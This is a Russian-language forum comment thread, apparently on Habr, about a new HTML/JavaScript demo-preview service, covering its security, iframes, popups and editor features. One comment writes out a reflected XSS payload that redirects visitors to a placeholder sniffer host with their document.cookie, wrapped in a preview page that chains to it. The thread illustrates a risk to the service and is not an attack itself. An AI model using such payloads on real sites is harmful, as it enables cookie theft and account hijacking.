Pull to refresh

Comments

Тьфу ты, забыл, спасибо. Надеюсь никто не будет затыкивать))))
UFO landed and left these words here
Искодный код в исходном код, как бы. Или действительно надо?
UFO landed and left these words here
Мне кажется что не стоит, т.к. вид уже будет не тот с фремами. Лучше просто ссылку (если уж человек не может посмотреть исходный код).
О, ждите революцию) Не догадался в нативном превью заюзать iframe :-\
внесу в закладки, неплохо, может быть запретить javascriptы всяких редиректов и т.д., если сервис станет популярным, то, допустим на фрилансе говоришь заказчику — я хочу вот так вот demopreview.xexo.info/demo/view/b7c336729412877c4b6ffbef8d3a946e.html, а там бац, использование пассивной XSS какого-нибудь сайта (небойтесь, там всего-лишь редирект на хабр).
Как раз составлял список exception'ов
Ээ, как вы представляете там XSS?
Ну редирект на другой ресурс. Грубо на: site.com/search.php?q="&gt<sсript>alert('КуКу')</sсript>
ну допустим кто-то нашёл XSS на Yandex (что-нибудь аля shop.yandex.ru/?category="><script>window.location='http://sniff-here.com/?'+document.cookie</script>), т.е. кто зайдёт туда у того угонятся кукисы, и в этом сервисе создать демонстрацию:

<script>
window.location='http://shop.yandex.ru/?category="><script>window.location=\'http://sniff-here.com/?\'+document.cookie</script>';
</script>

Сначала редирект на XSS, а с XSS редирект на снифер с куками.
Это уже XSS у Yandex.
С такойже простотой может человек использовать и .narod.ru и ещё много мест где выложить свой html.
И тут запрещать что то нет смысла, во первых javascript очень гибкий язык и любые запреты можно будет обойти а во вторых это уже ограничивает свободу на этом ресурсе (например я не смогу выложить пример с document.cookie или window.location если их запретят)
+ запретить iframe и тому подобное, тоже из-за безопасности и что бы не было рекламы с кучей попапов.
и сделать сервис совсем бесполезным? XD
а вы хотите получать ссылку на работу и ловить кучу попапов? да и iframe редко лоя хороших вещей использутеся.
По-моему, если вам дают ссылку на работу, а вы там увидите кучу попапов, то вы уже можете составить мнение о человеке, который вам дал такую ссылку. Некачественные источники отсеются. Это естественный отбор.
интересно, а если кто хочет показать пример именно с iframe, frameset и т.п.? Думаю просто не нужно тупо ходить по всем ссылкам которые встречаешь. Это ведь может провернуть кто угодно и на своем хомяке. Хотя заставил задуматься, да.
Если очень критично могу убрать или поставить другое что-нибудь.
я к тому, что иногда требуется полный контроль над страницей, а не только над внутренностями body.
например, подключить xslt, прописать xmlns, мету для ie8…
А если это делать в конструкторе (справа, в сером div'е), будет достаточно? Старался максимально упростить процесс верстки.
проще просто сделать пресет с базовым хтмл и поставить курсор внутрь боди…
Думаю, наверное к этому и приду
можно сделать что то типа такого: грузится страничка с iframe src= «url» и url заменяется на iframe.html с вашего сервера. и рядом ссылка вида «Если хотите посмотреть с включеным iframe жмякните сюда». Ну и для js тож самое можно, что б пользователь сам выбирал что ему смотреть.
Зачем такие сложности то?
Вы поупапов боитесь? А на сайт который в первый раз заходите, не боитесь поупапов?

Тут максимум удобности для разработчика.
угу, безумно боюсь, так боюсь что аж кушать не могу. попап привел для примера. можно засунуть любую гадость начинаю от adware заканчивая чем угодно. советую взять за правило, что приложения должно быть сначала безопастным для пользователя и только потом удобным.
А если человек на своем хостинге выложит такую страницу? Хостерам тоже фильтровать все файлы пользователя на iframe и поупапы?
мы сейчас говорим о сервисе который сделал Freem, а не о каком то гипотетическом хостинге.
Я просто имею ввиду тут не нужны ограничения, это только усложнит пользование сервисом но безопасность почти не увеличит.
дело ваше, я всего лишь изложил свою точку зрения и вариант решения.
Простите, допустил не простительную оплошность, скоро все верну на место.
На счет ограничений по Javascript, посмотрите на этот код. Я право, не знаю как с ним бороться. Посему накладываю ответственность, на автора, а также на выложившего ссылку для публичного или личного доступа
вроде как ничего не произошло :)

javascript://xn--alert('')-11ha1ib/ какой-то
Браузер? У меня Опера10b. Работает
Помотрел FF не собрал код, IE собрал
опять же, глупо будет запрещать подтягивать внешние JS (те-же фреймворки)
Пошел смотреть kcaptcha. Подом подумал, что нет ничего проще как с помощью нативного проView, забивать данные в поле капчи нужные данные)))
всётакие ее и поставлю)
аут. С помощью нативного преView, забивать нужные данные в поле капчи )))
Хьасан, суна хаар хьо Iийра воций цхьаъ ца дича ;-)
Дала аьтто бойл!
Нажатие клавиши Tab полезно перехватывать и вставлять горизонтальный отступ (как в обычных редакторах кода), иначе сервис можно будет использовать только в режиме копирования/вставки.
Спасибо, уже в туду. Выберу денёк и обновлю всё сразу…
UFO landed and left these words here
Рад что оказалось полезным еще одному хабрачеловеку. Спасибо за пользование
Люблю PHP, а превью с js/html потому как, сделай я там PHP, меня не правильно поймут)
если всё будет путем, в выходные будет обновление, причем интересное
Sign up to leave a comment.

Articles